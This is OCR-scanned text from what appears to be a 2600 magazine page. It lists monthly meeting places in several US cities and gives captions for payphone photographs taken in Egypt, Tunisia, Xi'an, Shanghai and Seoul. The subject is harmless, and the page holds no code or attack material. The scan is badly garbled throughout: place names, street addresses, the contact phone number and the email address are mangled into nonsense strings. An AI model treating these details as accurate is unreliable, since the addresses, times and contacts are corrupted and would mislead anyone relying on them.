Njt'diviile: J IN M.irkcl, l9|7 
Bread way. 

Aimtiu: J>ibic Mall limd 
Dnllus: MacuA’s Pixm. C-ini|.|vn Jfc 
Prptkit. 7 pm. 

floKilonr t^flfe NfchoJai in (bliana I 
Sum Minmio; Ncnli S|| . M :L | I i . >■ >> I 
CnurT ft pm 

Utah 

Salt | ,ake City: '/(■ M l N|gj| E , L 
food coun near Z»nn > Bank: 

Vermulll 

hurliiiplun: Uortim Books ul 
Church Sr anil Cherry St, n n tlu v 
hctond Fluor of die cafe. 

VirginU i.'.esf Dklrid «f f ulumhldl 
Washington 

SriitlCK WjLsIuogtort Stake Conved 
tiou Center, Ilrtl Fluor, ft priL 

\V riceoimln 

MadiNifl: Union Suulh '^17 n 
R ajoJall Ave I mi lilt luWr_r l(*^j : n 
the Martin J.uihcr kmp Fi- LqiJngc 
bv da payphfflvs Paypfuiiu': tftdtil 
25 1*9909'.' 

Milw aukee I WBiii* uluisH); May cm 

Mall iti Hwjt | HO A Nurib ,^ vc ni 
Rikitti 0 1 1ft or G 1 50, ft pm 


Alt mifeilnES Like place on the first Friday of lhe month. Unless otherwise noted they start arr^BTocaTKC' 

To start a meeriag in your city, leave a message & phone number he (fi3 h 15 \ -26(K) or send email to mreungs@26()(kom. 
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Alexandria. Egypt* It's illegal to take pictures in 
Egyptian airports. Here's one the) couldn't stop* 


Photo hy Tom Mele 
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Tunis, Tunisiu, Tutting phuuigrdphs in public here ic comildi. red 
an □ He rise worthy uf incaa’eroQOn, Thiv was a "drive-hv" rij'i.mc 
of ihc yHivphrioc a i w uns t hiit exisi throng hi »iri the city ■ there are no 
stflgle puv phone', a n\ w he re . 

Photo by John Freund 


Payphones 













Xi'an* This card -only phone is the most common 

Shanghai, I I 

li s type accepts both coins and cards. 


type. The Writing on the blue plastic says: "It is every- 



J 

one's duty to be careful with public phones," 




Photos by Robin Kearey 


Come and visit our website and see our vast array of payphone 
photos that we’ve compiled! http://www.2600.com 








Photos by Robin Kearey 


Look on the other side of this page for even more photos! 




Seouh This is a rare photic too Us location is 
probably even more rare. 
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